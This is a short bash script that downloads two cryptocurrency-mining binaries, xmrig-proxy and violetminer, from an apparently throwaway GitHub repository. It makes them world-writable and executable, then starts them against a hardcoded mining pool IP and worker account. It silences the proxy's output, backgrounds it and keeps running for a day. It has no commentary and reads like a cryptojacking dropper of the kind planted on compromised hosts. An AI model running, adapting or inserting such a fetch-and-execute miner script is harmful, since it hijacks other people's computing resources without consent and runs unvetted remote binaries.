#!/bin/bash
wget https://github.com/iaidjb18ha/b/raw/main/xmrig-proxy
wget https://github.com/iaidjb18ha/b/raw/main/violetminer
chmod 777 xmrig-proxy violetminer
./xmrig-proxy -a rx/0 -o 168.235.86.33:3393 -u SK_QzApkbVGsAxyQykaWSnEF.AutoBitcoin_novalanto -p x -b 0.0.0.0:3393 -m simple >/dev/null &
./violetminer --pool 168.235.86.33:3393 --username SK_QzApkbVGsAxyQykaWSnEF.AutoBitcoin_novalanto --password x --algorithm wrkzcoin
sleep 24h
